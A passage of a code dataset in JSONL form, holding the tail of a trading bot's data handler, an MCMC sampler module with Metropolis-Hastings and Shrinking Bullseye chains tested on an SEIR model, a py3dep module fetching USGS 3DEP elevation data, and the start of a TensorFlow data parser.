self.subscribed_symbols if self.current_bar(symbol).date < self.waiting_for_bar_date]:\n self.waiting_for_bar_date = self.waiting_for_bar_date + self.bar_size\n self.events_queue.put(MarketEvent('on_close'))\n\n def _update_from_bars(self, e):\n symbol = e.symbol\n df = e.df\n latest_reported_bar_date = df.index[-1].to_datetime()\n current_bar_date = self.current_bar(symbol).date\n\n try:\n assert(now() > latest_reported_bar_date)\n assert(now() <= (latest_reported_bar_date+self.bar_size) + datetime.timedelta(seconds=0.5)) # 0.5 seconds added for leeway\n except AssertionError as e:\n logging.critical('{}, {}, {}'.format(now(), latest_reported_bar_date, latest_reported_bar_date+self.bar_size))\n raise(e)\n\n past_bars = df[:-1]\n current_bar = df[-1:].iloc()[0]\n\n self._data[symbol]['df'] = past_bars\n self._data[symbol]['latest_bars'] = past_bars.reset_index()[['datetime', 'open', 'high', 'low', 'close', 'volume']].values.tolist()\n self._data[symbol]['open'] = current_bar['open']\n self._data[symbol]['high'] = current_bar['high']\n self._data[symbol]['low'] = current_bar['low']\n self._data[symbol]['close'] = current_bar['close']\n self._data[symbol]['volume'] = current_bar['volume']\n self._data[symbol]['date'] = latest_reported_bar_date\n\n def _update_from_tick(self, e):\n symbol = e.symbol\n for updated_field_type, updated_value in e.values_dict.items():\n\n self._data[symbol][updated_field_type] = updated_value\n self.updated_at = now()\n\n if 'close' in e.values_dict:\n self.events_queue.put(MarketEvent('on_tick', symbol))\n\n","sub_path":"botcoin/common/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":16402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"158681646","text":"import numpy as np\nimport scipy as sp\nimport numpy.linalg as npla\nimport scipy.linalg as scla\nfrom scipy import stats as st\nfrom scipy.integrate import ode\nimport sys\nimport matplotlib.pyplot as plt\nimport time\n\nnp.seterr(all='ignore')\n\nclass Sampler(list):\n def __init__(self,dat,prior,like,start,chains=4,sampler_type=1,size=1, fwdMod=lambda x: x, S=np.array([]), fS=np.array([])):\n self.chains= chains\n self.size = size\n\n for i in range(0,chains):\n if sampler_type == 1:\n self.append(MetHastChain_NormProp(dat,lambda x: prior(x)*like(x),start,size))\n\n elif sampler_type == 2:\n self.append(ShrinkingBullseyeChain_NormProp(dat,prior,like,fwdMod,start,S,fS,size))\n\n def burn(self,var,N=1):\n for i in range(0,self.chains):\n self[i].burn(var,N)\n\n def sample(self,var,N=1):\n for chain in self:\n size=40\n sys.stdout.write(\"[%s]\" % (\" \" * 20))\n sys.stdout.flush()\n sys.stdout.write('\\b'*(size+2))\n for i in range(0,N):\n chain.update(var)\n\n count = int((size*1.0*i)/N)+1\n sys.stdout.write('['+'='*count+' '*(size-count)+']'+'%d%%'%int((1.0*count/size)*100))\n sys.stdout.write('\\r')\n sys.stdout.flush()\n sys.stdout.write('\\n')\n\n return([i.samps for i in self])\n\nclass MetHastChain_NormProp(object):\n def __init__(self,dat,post,start,size=1):\n self.data = dat\n self.post = post\n self.size = size\n self.dim = [size,np.shape(start)[0]]\n self.samps = np.zeros(self.dim)\n self.samps[0,:] = start\n self.curr = self.samps[0]\n self.t = 0\n\n def posterior(self,x):\n return(self.post(x,self.data))\n\n def propose(self,var):\n self.cand = np.random.multivariate_normal(self.curr,var,1)[0]\n\n def update(self,var):\n self.cand = np.random.multivariate_normal(self.curr,var,1)[0]\n if (self.posterior(self.curr) == 0.0) or np.isnan(self.posterior(self.curr)):\n self.a = 0\n\n else:\n self.a = min(1,self.posterior(self.cand)/self.posterior(self.curr))\n\n if (np.random.binomial(1,self.a,1)==1) and (self.t < self.size):\n self.samps[self.t,:] = self.cand\n self.curr = self.cand\n\n elif (np.random.binomial(1,self.a,1)==0) and (self.t < self.size):\n self.samps[self.t,:] = self.curr\n\n elif (np.random.binomial(1,self.a,1)==1) and (self.t >= self.size):\n self.samps = np.append(self.samps,[self.cand],axis=0)\n self.curr=self.cand\n\n else:\n self.samps = np.append(self.samps,[self.curr],axis=0)\n\n self.t += 1\n\n def burn(self,var,N=1):\n size = 40\n sys.stdout.write(\"[%s]\" % (\" \" * 20))\n sys.stdout.flush()\n sys.stdout.write('\\b'*(size+2))\n for i in range(0,N):\n self.update(var)\n self.t -= 1\n\n count = int((size*1.0*i)/N)+1\n sys.stdout.write('['+'='*count+' '*(size-count)+']'+'%d%%'%int((1.0*count/size)*100))\n sys.stdout.write('\\r')\n sys.stdout.flush()\n sys.stdout.write('\\n')\n #self.t += 1\n\nclass ShrinkingBullseyeChain_NormProp(object):\n def __init__(self,dat,prior,like,fwdMod,start,S,fS,size=1):\n self.data = dat\n self.prior = prior\n self.like = like\n self.fwdMod = fwdMod\n \n self.size = size\n self.shape = [size,np.shape(start)[0]]\n self.dim = np.shape(start)[0]\n self.samps = np.zeros(self.shape)\n\n self.Ndef = int((2*self.dim+1)*(self.dim+2)/2)\n self.N = int(np.ceil(np.sqrt(self.dim)*self.Ndef))\n \n self.samps[0,:] = start\n self.curr = self.samps[0]\n\n self.refine_tracker = []\n\n if np.ndim(S)==1:\n self.S = np.reshape(S,[np.shape(S)[0],1])\n\n elif np.ndim(fS)==1:\n self.fS = np.reshape(fS,[np.shape(fS)[0],1])\n\n else:\n self.S = S\n self.fS = fS\n \n self.t = 0\n self.accept_freq = 0\n\n def radCalc(self,x,samps,N):\n if N > np.shape(self.S)[0]:\n print('Not possible!')\n return()\n\n radii = np.sort(npla.norm(self.S-x,ord=2,axis=1))\n R = radii[N]\n return(R)\n\n #Functions to calculate regression of fwd model response at candidate point and at current point\n def cand_regress(self):\n cand_Rdef = self.radCalc(self.cand,self.S,self.Ndef)\n cand_R = self.radCalc(self.cand,self.S,self.N)\n self.cand_B = self.S[npla.norm(self.S-self.cand,ord=2,axis=1) <= cand_R]\n self.cand_fB = self.fS[npla.norm(self.S-self.cand,ord=2,axis=1) <= cand_R]\n while np.shape(self.cand_B)[0] > self.N:\n self.cand_B = np.delete(self.cand_B,np.random.choice(range(0,np.shape(self.cand_B)[0])),axis=0)\n self.cand_fB = np.delete(self.cand_fB,np.random.choice(range(0,np.shape(self.cand_fB)[0])),axis=0)\n \n W = np.sqrt([min(1,(1-((npla.norm(self.cand_B[i,:]-self.cand)-cand_Rdef)/(cand_R-cand_Rdef))**3)**3) for i in range(0,np.shape(self.cand_B)[0])])\n W = np.diag(W)\n self.cand_W = W\n \n phi = np.zeros([self.N,2*self.dim+1])\n phi[:,0] = np.ones(self.N)\n phi[:,1:(self.dim+1)] = self.cand_B\n phi[:,(self.dim+1):(2*self.dim+1)] = self.cand_B**2\n self.cand_phi = phi\n\n self.cand_q,self.cand_r = npla.qr(np.dot(W,phi),mode='complete')\n q = self.cand_q[:,0:self.cand_r.shape[1]]\n r = self.cand_r[0:self.cand_r.shape[1],:]\n \n self.cand_Z = np.dot(npla.inv(r),q.T)\n self.cand_Z = np.dot(self.cand_Z,np.dot(W,self.cand_fB))\n\n def curr_regress(self): \n curr_Rdef = self.radCalc(self.curr,self.S,self.Ndef)\n curr_R = self.radCalc(self.curr,self.S,self.N)\n self.curr_B = self.S[npla.norm(self.S-self.curr,ord=2,axis=1) <= curr_R]\n self.curr_fB = self.fS[npla.norm(self.S-self.curr,ord=2,axis=1) <= curr_R]\n while np.shape((self.curr_B))[0] > self.N:\n self.curr_B = np.delete(self.curr_B,np.random.choice(range(0,np.shape(self.curr_B)[0])),axis=0)\n self.curr_fB = np.delete(self.curr_fB,np.random.choice(range(0,np.shape(self.curr_fB)[0])),axis=0)\n \n W = np.sqrt([min(1,(1-((npla.norm(self.curr_B[i,:]-self.curr)-curr_Rdef)/(curr_R-curr_Rdef))**3)**3) for i in range(0,np.shape(self.curr_B)[0])])\n W = np.diag(W)\n self.curr_W = W\n \n phi = np.zeros([self.N,2*self.dim+1])\n phi[:,0] = np.ones(self.N)\n phi[:,1:(self.dim+1)] = self.curr_B\n phi[:,(self.dim+1):(2*self.dim+1)] = self.curr_B**2\n self.curr_phi = phi\n\n self.curr_q,self.curr_r = npla.qr(np.dot(W,phi), mode='complete')\n q = self.curr_q[:,0:self.curr_r.shape[1]]\n r = self.curr_r[0:self.curr_r.shape[1],:] \n \n self.curr_Z = np.dot(npla.inv(r),q.T)\n self.curr_Z = np.dot(self.curr_Z,np.dot(W,self.curr_fB))\n\n #Functions to cross validate the regression at the candidate and current points\n def cand_cross_val(self,curr_post,eps):\n a_list = np.zeros(self.N)\n\n for i in range(0,self.N):\n if self.cand_r.shape[0] > self.cand_r.shape[1]:\n cand_q_up, cand_r_up = scla.qr_delete(self.cand_q,self.cand_r,k=i)\n q = cand_q_up[:,0:cand_r_up.shape[1]]\n r = cand_r_up[0:cand_r_up.shape[1],:]\n\n elif self.cand_r.shape[0] == self.cand_r.shape[1]:\n cand_q_up, cand_r_up = scla.qr_delete(self.cand_q,self.cand_r,k=i)\n q = cand_q_up\n r = cand_r_up\n\n else:\n cand_q_up, cand_r_up = scla.qr_delete(self.cand_q,self.cand_r,k=i)\n q = cand_q_up[:,0:cand_r_up.shape[1]]\n r = cand_r_up[0:cand_r_up.shape[1],:] \n \n \n cand_Z = np.dot(npla.inv(r),q.T) \n cand_Z = np.dot(cand_Z,np.dot(self.cand_W[np.arange(self.N)!=i,:][:,np.arange(self.N)!=i],self.cand_fB[np.arange(self.N)!= i,:]))\n\n cand = self.cand\n cand_post = self.prior(self.cand)*self.like(np.dot(np.append(1,np.append(cand,cand**2)),self.cand_Z))\n\n if cand_post == 0.0:\n a_list[i] = 0\n\n else: \n a_list[i] = min(1,cand_post/curr_post)\n\n self.a_list = a_list\n err_list = np.abs(self.a-a_list)# + np.abs(min(1,1./self.a)-np.array([min(1,1./a) for a in a_list]))\n err = np.max(err_list)\n if err >= eps:\n flag = 1\n else:\n flag =0\n\n return(flag)\n \n\n def curr_cross_val(self,cand_post,eps):\n a_list = np.zeros(self.N)\n\n for i in range(0,self.N):\n if self.cand_r.shape[0] > self.cand_r.shape[1]:\n curr_q_up, curr_r_up = scla.qr_delete(self.curr_q,self.curr_r,k=i)\n q = curr_q_up[:,0:curr_r_up.shape[1]]\n r = curr_r_up[0:curr_r_up.shape[1],:]\n\n elif self.curr_r.shape[0] == self.curr_r.shape[1]:\n curr_q_up, curr_r_up = scla.qr_delete(self.curr_q,self.curr_r,k=i)\n q = curr_q_up\n r = curr_r_up\n\n else:\n curr_q_up, curr_r_up = scla.qr_delete(self.curr_q,self.curr_r,k=i)\n q = curr_q_up[:,0:curr_r_up.shape[1]]\n r = curr_r_up[0:curr_r_up.shape[1],:]\n \n curr_Z = np.dot(npla.inv(r),q.T)\n curr_Z = np.dot(curr_Z,np.dot(self.curr_W[np.arange(self.N)!=i,:][:,np.arange(self.N)!=i],self.curr_fB[np.arange(self.N)!= i,:]))\n\n curr = self.curr\n curr_post = self.prior(self.curr)*self.like(np.dot(np.append(1,np.append(curr,curr**2)),self.curr_Z))\n\n if cand_post == 0.0:\n a_list[i] = 0\n\n else: \n a_list[i] = min(1,cand_post/curr_post)\n\n \n err_list = np.abs(min(1,self.a)-np.array([a for a in a_list]))# + np.abs(min(1,1./self.a)-np.array([min(1,1./a) for a in a_list]))\n err = np.max(err_list)\n if err >= eps:\n flag = 1\n else:\n flag =0\n\n return(flag)\n\n\n def propose(self,var):\n self.cand = np.random.multivariate_normal(self.curr,var,1)[0]\n\n #Functions to refine parameter samples\n\n def refine(self,theta,R):\n cons = ({'type' : 'ineq', 'fun': lambda x: R - npla.norm(x - theta, ord=2)},{'type' : 'ineq', 'fun': lambda x: self.prior(x)})\n sol = sp.optimize.minimize(lambda x: -1*np.log(min(npla.norm(x-self.S,ord=2,axis=1))), theta, constraints=cons, options = {'maxiter' : 10000})\n self.refine_tracker.append(self.t)\n return(sol['x'])\n \n def cand_refine(self):\n update = self.refine(self.cand,self.radCalc(self.cand,self.S,self.Ndef))\n self.S = np.vstack([self.S,update])\n self.fS = np.vstack([self.fS,self.fwdMod(update)])\n\n def curr_refine(self):\n update = self.refine(self.curr,self.radCalc(self.curr,self.S,self.Ndef))\n self.S = np.vstack([self.S,update])\n self.fS = np.vstack([self.fS,self.fwdMod(update)])\n \n #Update routine\n def update(self,var): \n self.cand = np.random.multivariate_normal(self.curr,var,1)[0]\n\n self.cand_regress()\n\n if self.t==0:\n self.curr_regress()\n\n self.cand_p = self.cand\n self.curr_p = self.curr\n self.cand_post = self.prior(self.cand)*self.like(np.dot(np.append(1,np.append(self.cand_p,self.cand_p**2)),self.cand_Z))\n self.curr_post = self.prior(self.curr)*self.like(np.dot(np.append(1,np.append(self.curr_p,self.curr_p**2)),self.curr_Z))\n\n if (self.cand_post == 0.0) or np.isnan(self.cand_post):\n self.a = 0\n\n else: \n self.a = min(1,self.cand_post/self.curr_post)\n\n eps = 0.1*(self.t+1)**(-0.1)\n rand_refine = 0.01*(self.t+1)**(-0.2)\n #eps = 0.1**(-0.1)\n #rand_refine = 0.01\n\n while self.cand_cross_val(self.curr_post,eps):\n self.cand_refine()\n self.cand_regress()\n \n self.cand_p = np.append(1,np.append(self.cand,self.cand**2))\n self.curr_p = np.append(1,np.append(self.curr,self.curr**2))\n self.cand_post = self.prior(self.cand)*self.like(np.dot(self.cand_p,self.cand_Z))\n self.curr_post = self.prior(self.curr)*self.like(np.dot(self.curr_p,self.curr_Z))\n\n if (self.cand_post==0.0) or np.isnan(self.cand_post):\n self.a = 0\n \n else:\n self.a = min(1,self.cand_post/self.curr_post)\n\n \n while self.curr_cross_val(self.cand_post,eps):\n self.curr_refine()\n self.curr_regress()\n\n self.cand_p = self.cand\n self.curr_p = self.curr\n self.cand_post = self.prior(self.cand)*self.like(np.dot(np.append(1,np.append(self.cand_p,self.cand_p**2)),self.cand_Z))\n self.curr_post = self.prior(self.curr)*self.like(np.dot(np.append(1,np.append(self.curr_p,self.curr_p**2)),self.curr_Z))\n\n if self.cand_post==0.0:\n self.a = 0\n \n else:\n self.a = min(1,self.cand_post/self.curr_post)\n\n \n if np.random.binomial(1,rand_refine)==1:\n self.cand_refine()\n self.curr_refine()\n\n move = np.random.binomial(1,self.a,1)\n if (move==1) and (self.t < self.size):\n self.samps[self.t,:] = self.cand\n self.curr = self.cand\n self.curr_Z = self.cand_Z\n self.accept_freq += 1\n\n elif (move==0) and (self.t < self.size):\n self.samps[self.t,:] = self.curr\n\n elif (move==1) and (self.t >= self.size):\n self.samps = np.append(self.samps,[self.cand],axis=0)\n self.curr=self.cand\n self.curr_Z = self.cand_Z\n self.accept_freq += 1\n\n else:\n self.samps = np.append(self.samps,[self.curr],axis=0)\n\n self.t += 1\n\n def burn(self,var,N=1):\n size = 40\n sys.stdout.write(\"[%s]\" % (\" \" * 20))\n sys.stdout.flush()\n sys.stdout.write('\\b'*(size+2))\n for i in range(0,N):\n self.update(var)\n self.t -= 1\n self.accept_freq = 0\n\n count = int((size*1.0*i)/N)+1\n sys.stdout.write('['+'='*count+' '*(size-count)+']'+'%d%%'%int((1.0*count/size)*100))\n sys.stdout.write('\\r')\n sys.stdout.flush()\n sys.stdout.write('\\n')\n\n \n \n###############################\n#Testing the SB Implementation#\n###############################\ndef SEIR(y,t,a,b,c):\n s,e,i,r = y\n yprime = [-b*s*i, b*s*i - a*e, a*e - c*i,c*i]\n return(yprime)\n\ndef fwdMod(parms,t1,t_steps = 1000,y0=[99,0,1,0]):\n times = np.linspace(0,t1,t_steps)\n a,b,c = parms\n output,info = sp.integrate.odeint(SEIR,y0,times,args=(a,b,c), full_output=True)\n return(output[-1,:])\n \ndef fwd(x):\n hold = np.array([.3,x,.5])\n return(fwdMod(np.array(hold),3).clip(min=0))\n\ntrue_parms = np.array([.3,np.random.uniform(0,1.5),.5])\ntest_dat = np.zeros([10,4])\ntrue_traj = fwd(true_parms[1])\nfor i in range(0,10):\n test_dat[i,] = fwdMod(true_parms,3) + np.random.multivariate_normal(np.zeros(4),10*np.eye(4))\n\ndef test_like(x):\n var = 10*np.eye(4)\n like = [sp.stats.multivariate_normal.pdf(test_dat[i,],x,var) for i in range(0,np.shape(test_dat)[0])]\n #like = [sp.stats.binom.pmf(test_dat[i,j], x[j], .9) for i in range(0,10) for j in range(0,4)]\n return(np.prod(like))\n\ndef test_prior(x):\n if np.array([x < 0.]).any() or np.array([x > 10.]).any():\n return(0.)\n\n else:\n return(1)\n\ndef test_post(x,dat=0):\n return(test_prior(x)*test_like(fwd(x)))\n\ndef gr_diag(x):\n n = float(x.shape[0])\n m = float(x.shape[1])\n B = np.sum((np.mean(x,axis=0)-np.mean(x))**2)*(n/(m-1))\n W = np.mean(np.var(x,axis=0))/m\n V = ((n-1)/n)*W + ((m+1)/(m*n))*B\n R = np.sqrt(2*V/W)\n return(R)\n\ntest_S = np.zeros([1000,1])\ntest_fS = np.zeros([1000,4])\nfor i in range(0,1000):\n test_S[i,:] = [np.random.uniform(0,10) for j in range(0,1)]\n test_fS[i,:] = fwd(test_S[i])\n #test_fS[i,:] = test_like(fwd(test_S[i]))\n\nstart = np.array([np.random.uniform(0,1.5) for t in range(0,1)])\n\nn_samps = 70000\ntest_sampler = Sampler(test_dat,test_prior,test_like,start,4,2,n_samps,fwd,test_S,test_fS)\n\nstart_time = time.time()\n\nburn_var = .1\ntest_sampler.burn(burn_var*np.eye(1),int(.1*n_samps))\n\nprop_var = .01\ntest_sampler.sample(prop_var*np.eye(1),n_samps)\n\nend_time = time.time()\nrun_time = end_time - start_time\n\nref_sampler = Sampler(test_dat,test_prior,test_like,start,4,1,n_samps,fwd,test_S,test_fS)\n\nstart_time = time.time()\nref_sampler.burn(burn_var*np.eye(1),int(.1*n_samps))\n\nref_sampler.sample(prop_var*np.eye(1),n_samps)\n\nend_time = time.time()\nref_time = end_time - start_time\n\n\n#$$$$$$$$$$$$$$$$$$$$$$$$#\n#$$$$$$$$$$CRUFT$$$$$$$$$#\n#$$$$$$$$$$$$$$$$$$$$$$$$#\n\n#test_chain = ShrinkingBullseyeChain_NormProp(test_dat,test_prior,test_like,fwd,np.abs(start),test_S,test_fS,size=10)\n#test_chain = ShrinkingBullseyeChain_NormProp_LikeRegress(test_dat,test_prior,test_like,fwd,np.abs(start),test_S,test_fS,size=10)\n#test_chain = MetHastChain_NormProp(test_dat,test_post,start) \n\n#hold = np.zeros([10000,2])\n#for i in range(0,10000):\n# print(test_chain.curr)\n# test_chain.update(var_val*np.eye(1))\n# print(test_chain.cand)\n# hold[i,:] = test_chain.curr\n# print(test_chain.a)\n\n#########################\n#Plotting the likelihood#\n#########################\n#def plot_like(x,n):\n# hold = true_parms.copy()\n# hold[n] = x\n# return(test_like(fwd(hold)))\n#\n#x = np.linspace(0, 2*max(true_parms),1000)\n#y0 = np.array([plot_like(t,0) for t in x])\n#y1 = np.array([plot_like(t,1) for t in x])\n#y2 = np.array([plot_like(t,2) for t in x])\n#\n#plt.plot(x,y0)\n#plt.plot(x,y1)\n#plt.plot(x,y2)\n","sub_path":"Code/Shrinking_Bullseye_First_Build/mcmc.py","file_name":"mcmc.py","file_ext":"py","file_size_in_byte":18230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"372853421","text":"\"\"\"Get data from 3DEP database.\"\"\"\nfrom itertools import product\nfrom pathlib import Path\nfrom typing import Dict, Iterator, List, Optional, Tuple, Union\n\nimport cytoolz as tlz\nimport numpy as np\nimport pygeoutils as geoutils\nimport rasterio as rio\nimport rasterio.warp as rio_warp\nimport xarray as xr\nfrom pygeoogc import WMS, MatchCRS, RetrySession, ServiceURL\nfrom shapely.geometry import MultiPolygon, Polygon\n\nfrom .exceptions import InvalidInputType\n\nDEF_CRS = \"epsg:4326\"\n\n\ndef get_map(\n layers: Union[str, List[str]],\n geometry: Union[Polygon, Tuple[float, float, float, float]],\n resolution: float,\n geo_crs: str = DEF_CRS,\n crs: str = DEF_CRS,\n output_dir: Optional[Union[str, Path]] = None,\n) -> Dict[str, bytes]:\n \"\"\"Access to `3DEP `__ service.\n\n The 3DEP service has multi-resolution sources so depending on the user\n provided resolution the data is resampled on server-side based\n on all the available data sources. The following layers are available:\n - \"DEM\"\n - \"Hillshade Gray\"\n - \"Aspect Degrees\"\n - \"Aspect Map\"\n - \"GreyHillshade_elevationFill\"\n - \"Hillshade Multidirectional\"\n - \"Slope Map\"\n - \"Slope Degrees\"\n - \"Hillshade Elevation Tinted\"\n - \"Height Ellipsoidal\"\n - \"Contour 25\"\n - \"Contour Smoothed 25\"\n\n Parameters\n ----------\n layers : str or list\n A valid 3DEP layer or a list of them\n geometry : Polygon, MultiPolygon, or tuple\n A shapely Polygon or a bounding box (west, south, east, north)\n resolution : float\n The data resolution in meters. The width and height of the output are computed in pixel\n based on the geometry bounds and the given resolution.\n geo_crs : str, optional\n The spatial reference system of the input geometry, defaults to\n epsg:4326.\n crs : str, optional\n The spatial reference system to be used for requesting the data, defaults to\n epsg:4326.\n output_dir : str or Path, optional\n The output directory to also save the map as GTiff file(s), defaults to None.\n\n Returns\n -------\n dict\n A dict where the keys are the layer name and values are the returned response\n from the WMS service as bytes. You can use ``utils.create_dataset`` function\n to convert the responses to ``xarray.Dataset``.\n \"\"\"\n if not isinstance(geometry, (Polygon, MultiPolygon, tuple)):\n raise InvalidInputType(\"geometry\", \"Polygon or tuple of length 4\")\n\n _geometry = geoutils.geo2polygon(geometry, geo_crs, crs)\n\n _layers = layers if isinstance(layers, list) else [layers]\n if \"DEM\" in _layers:\n _layers[_layers.index(\"DEM\")] = \"None\"\n\n _layers = [f\"3DEPElevation:{lyr}\" for lyr in _layers]\n\n wms = WMS(ServiceURL().wms.nm_3dep, layers=_layers, outformat=\"image/tiff\", crs=crs)\n r_dict = wms.getmap_bybox(_geometry.bounds, resolution, box_crs=crs)\n\n if output_dir:\n geoutils.gtiff2file(r_dict, _geometry, crs, output_dir)\n\n ds = geoutils.gtiff2xarray(r_dict, _geometry, crs)\n\n valid_layers = wms.get_validlayers()\n rename = {lyr: lyr.split(\":\")[-1].replace(\" \", \"_\").lower() for lyr in valid_layers}\n rename.update({\"3DEPElevation:None\": \"elevation\"})\n\n if isinstance(ds, xr.DataArray):\n ds.name = rename[ds.name]\n else:\n ds = ds.rename({n: rename[n] for n in ds.keys()})\n\n return ds\n\n\ndef elevation_bygrid(\n xcoords: List[float],\n ycoords: List[float],\n crs: str,\n resolution: float,\n dim_names: Optional[Tuple[str, str]] = None,\n resampling: rio_warp.Resampling = rio_warp.Resampling.bilinear,\n) -> xr.DataArray:\n \"\"\"Get elevation from DEM data for a grid.\n\n This function is intended for getting elevations for a gridded dataset.\n\n Parameters\n ----------\n xcoords : tuple of two lists of floats\n A list containing x-coordinates of a mesh.\n ycoords : tuple of two lists of floats\n A list containing y-coordinates of a mesh.\n crs : str\n The spatial reference system of the input grid, defaults to epsg:4326.\n resolution : float\n The accuracy of the output, defaults to 10 m which is the highest\n available resolution that covers CONUS. Note that higher resolution\n increases computation time so chose this value with caution.\n dim_names : tuple\n A tuple of length two containing the coordinate names, defaults to [\"x\", \"y\"]\n resampling : rasterio.warp.Resampling\n The reasmpling method to use if the input crs is not in the supported\n 3DEP's CRS list which are epsg:4326 and epsg:3857. It defaults to bilinear.\n The available methods can be found `here `__\n\n Returns\n -------\n xarray.DataArray\n An data array with name elevation and the given dim names.\n \"\"\"\n if dim_names is None:\n dim_names = (\"x\", \"y\")\n\n bbox = (min(xcoords), min(ycoords), max(xcoords), max(ycoords))\n r_dict = _elevation_bybox(bbox, crs, resolution)\n coords = product(xcoords, ycoords)\n elev_arr = _sample_tiff(r_dict[\"3DEPElevation:None_dd_0_0\"], coords, crs, resampling)\n\n return xr.DataArray(\n elev_arr.reshape((len(xcoords), len(ycoords))),\n dims=dim_names,\n coords=[xcoords, ycoords],\n name=\"elevation\",\n attrs={\"units\": \"meters\"},\n )\n\n\ndef _sample_tiff(\n content: bytes,\n coords: Union[List[Tuple[float, float]], Iterator[Tuple[float, float]]],\n crs: str,\n resampling: rio_warp.Resampling,\n) -> np.ndarray:\n \"\"\"Sample a tiff response for a list of coordinates.\n\n Parameters\n ----------\n content : bytes\n coords : list of tuples\n A list containing x- and y-coordinates of a mesh, [(x, y), ...].\n crs : str\n The spatial reference system of the input grid, defaults to epsg:4326.\n resolution : float\n resampling : rasterio.warp.Resampling\n The reasmpling method to use if the input crs is not in the supported\n 3DEP's CRS list which are epsg:4326 and epsg:3857. It defaults to bilinear.\n The available methods can be found `here `__\n\n Returns\n -------\n numpy.ndarray\n An array of elevations where its index matches the input coords list\n \"\"\"\n with rio.MemoryFile() as memfile:\n memfile.write(content)\n with memfile.open() as src:\n transform, width, height = rio_warp.calculate_default_transform(\n src.crs, crs, src.width, src.height, *src.bounds\n )\n kwargs = src.meta.copy()\n kwargs.update({\"crs\": crs, \"transform\": transform, \"width\": width, \"height\": height})\n\n with rio.vrt.WarpedVRT(src, **kwargs) as vrt:\n if crs != src.crs:\n for i in range(1, src.count + 1):\n rio_warp.reproject(\n source=rio.band(src, i),\n destination=rio.band(vrt, i),\n src_transform=src.transform,\n src_crs=src.crs,\n dst_transform=transform,\n crs=crs,\n resampling=resampling,\n )\n return np.array([e.item() for e in vrt.sample(coords)])\n\n\ndef _elevation_bybox(\n bbox: Tuple[float, float, float, float],\n crs: str,\n resolution: float,\n) -> xr.DataArray:\n \"\"\"Get elevation from DEM data for a list of coordinates.\n\n This function is intended for getting elevations for a gridded dataset.\n\n Parameters\n ----------\n bbox : tuple of two lists of floats\n A list containing x- and y-coordinates of a mesh, [[x-coords], [y-coords]].\n crs : str\n The spatial reference system of the input grid, defaults to epsg:4326.\n resolution : float\n The accuracy of the output, defaults to 10 m which is the highest\n available resolution that covers CONUS. Note that higher resolution\n increases computation time so chose this value with caution.\n\n Returns\n -------\n numpy.ndarray\n An array of elevations where its index matches the input gridxy list\n \"\"\"\n if not isinstance(bbox, tuple) or len(bbox) != 4:\n raise InvalidInputType(\"bbox\", \"tuple of length 4\")\n\n ratio_min = 0.01\n ratio_x = abs((bbox[2] - bbox[0]) / bbox[0])\n ratio_y = abs((bbox[3] - bbox[1]) / bbox[1])\n if (ratio_x < ratio_min) or (ratio_y < ratio_min):\n rad = ratio_min * abs(bbox[0])\n bbox = (bbox[0] - rad, bbox[1] - rad, bbox[2] + rad, bbox[3] + rad)\n\n req_crs = crs if crs.lower() in [DEF_CRS, \"epsg:3857\"] else DEF_CRS\n wms = WMS(\n ServiceURL().wms.nm_3dep, layers=\"3DEPElevation:None\", outformat=\"image/tiff\", crs=req_crs\n )\n return wms.getmap_bybox(bbox, resolution, box_crs=crs)\n\n\ndef elevation_bycoords(coords: List[Tuple[float, float]], crs: str = DEF_CRS) -> List[int]:\n \"\"\"Get elevation from Airmap for a list of coordinates.\n\n Parameters\n ----------\n coords : list of tuples\n Coordinates of the location as a tuple\n crs : str, optional\n The spatial reference of the input coord, defaults to epsg:4326 (lon, lat)\n\n Returns\n -------\n list of int\n Elevation in meter\n \"\"\"\n if not isinstance(coords, (list, Iterator)):\n raise InvalidInputType(\"coord\", \"list (or iterator) of tuples of length 2\", \"[(x, y), ...]\")\n\n if isinstance(coords, list) and any(len(c) != 2 for c in coords):\n raise InvalidInputType(\"coord\", \"list of tuples of length 2\", \"[(x, y), ...]\")\n\n coords_reproj = zip(*MatchCRS.coords(tuple(zip(*coords)), crs, DEF_CRS))\n coords_reproj = tlz.partition_all(100, coords_reproj)\n\n headers = {\"Content-Type\": \"application/json\", \"charset\": \"utf-8\"}\n elevations = []\n for chunk in coords_reproj:\n payload = {\"points\": \",\".join(f\"{lat},{lon}\" for lon, lat in chunk)}\n resp = RetrySession().get(ServiceURL().restful.airmap, payload=payload, headers=headers)\n elevations.append(resp.json()[\"data\"])\n\n return list(tlz.concat(elevations))\n\n\ndef deg2mpm(da: xr.DataArray) -> xr.DataArray:\n \"\"\"Convert ``xarray.Data[Array,set]`` from degree to meter/meter.\"\"\"\n attrs = da.attrs\n da = np.tan(np.deg2rad(da))\n da.attrs = attrs\n da.name = \"slope\"\n da.attrs[\"units\"] = \"meters/meters\"\n return da\n","sub_path":"py3dep/py3dep.py","file_name":"py3dep.py","file_ext":"py","file_size_in_byte":10562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"356762405","text":"from __future__ import division\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom scipy.interpolate import interp2d\nimport tensorflow as tf\nimport numpy as np\nimport gzip\nimport time\nimport os\nimport sys\nimport tensorflow.contrib.slim as slim\nfrom random import shuffle\nfrom shutil import copyfile, copytree\n\n# Import base model for defining early stopping hook\n# https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/training/session_run_hook.py\nfrom tensorflow.python.training import session_run_hook\nfrom tensorflow.python.training import training_util\n\n# Import plotting functions from 'reader.py'\n#from reader import *\n\n\n# Define list of transformations for data augmentation\ndef get_transformations(rotate=False, flip=False):\n if rotate and flip:\n #transformations = [[0,0], [0,1], [1,0], [1,1], [2,0], [2,1], [3,0], [3,1]]\n transformations = [[0,0], [0,1], [2,0], [2,1]]\n elif rotate:\n #transformations = [[0,0], [1,0], [2,0], [3,0]]\n transformations = [[0,0], [2,0]]\n #transformations = [[0,0], [1,0]]\n elif flip:\n transformations = [[0,0], [0,1]]\n else:\n transformations = [[0,0]]\n return transformations\n\n# Transforms 'example_proto' byte strings into decoded\n# onehot label and resized image array \ndef _parse_data(example_proto, res=64, transformation=None):\n features = {\"data\": tf.FixedLenFeature([res,res,1], tf.float32),\n \"coeff\": tf.FixedLenFeature([res,res,1], tf.float32),\n \"mesh\": tf.FixedLenFeature((), tf.string, default_value=\"\"),\n \"soln\": tf.FixedLenFeature([res,res,1], tf.float32)}\n parsed_features = 